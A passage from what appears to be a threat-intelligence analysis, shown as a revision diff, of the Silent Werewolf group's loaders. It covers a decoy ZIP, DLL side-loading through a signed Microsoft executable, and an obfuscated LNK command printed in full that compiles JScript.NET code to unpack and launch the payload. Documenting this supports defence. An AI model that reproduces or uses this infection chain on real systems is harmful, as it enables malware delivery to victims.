Malware or LLM? Silent Werewolf employs new loaders to attack Russian and Moldovan organizations

 - A ZIP file disguised as a

-configuration file, including:- a decoy PDF
+.iniconfiguration file, including:- a decoy PDF

 - the legitimate executable

-(version 10.0.17763.132), digitally signed by Microsoft Corporation - a malicious DLL that serves as a .NET loader
+DeviceMetadataWizard.exe(version 10.0.17763.132), digitally signed by Microsoft Corporation - a malicious DLL that serves as a .NET loader

-code embedded in the LNK to unpack the contents of the nested ZIP into a designated directory.
+The LNK file finds the downloaded archive in the %USERPROFILE% directory.
+It also compiles the JScript.NET code embedded in the LNK to unpack the contents of the nested ZIP into a designated directory.
 It then runs the extracted legitimate executable, which in turn loads the malicious DLL (the C# loader).

-Here is a command example from доказательства_0007093.lnk
+Here is a command example from доказательства_0007093.lnk:

 cmd.exe /c "set PATH=%windir%\system32;%PATH% & (for /R "%USERPROFILE%" %f in (dokazatelstva.zip) do @IF EXIST %f (chcp 65001 | echo | set /p="import System;import System.IO;import System.IO.Compression;import System.Text;import System.Diagnostics;function Main(){var args:String[]=System.Environment.GetCommandLineArgs();Directory.CreateDirectory(args[2]);System.IO.Compression.ZipFile.ExtractToDirectory(args[1], args[2]);System.IO.Compression.ZipFile.ExtractToDirectory(args[2] + "\\" + (Convert.ToChar(117)+Convert.ToChar(109)+Convert.ToChar(46)+Convert.ToChar(105)+Convert.ToChar(110)+Convert.ToChar(105)), args[2]);Process.Start("cmd.exe", "/C move " + System.Reflection.Assembly.GetExecutingAssembly().Location + " " + System.Reflection.Assembly.GetExecutingAssembly().Location + "_");}Main();">%TEMP%\UKSS1G4Q7H6S.a & for /f %j in ('dir /b /s /a:-d /o:-n "%SystemRoot%\Microsoft.Net\Framework\*jsc.exe"') do @set "_jsc=%j" & for /L %i in (1,1,3) do @if exist "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" (^st^art "" /MIN "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" & exit) else (@if exist %TEMP%\unzip.exe (%TEMP%\unzip.exe "%f" "%USERPROFILE%\J8ZUARAW71W7") else (@if not exist %TEMP%\unzip.exe_ (@if not exist %TEMP%\unzip.exe (C:\Windows\system32\forfiles.exe /P %SystemRoot% /M notepad.exe /C "cmd /c %_jsc% /nologo /r:System.IO.Compression.FileSystem.dll /out:%TEMP%\unzip.exe %TEMP%\UKSS1G4Q7H6S.a")))) ))"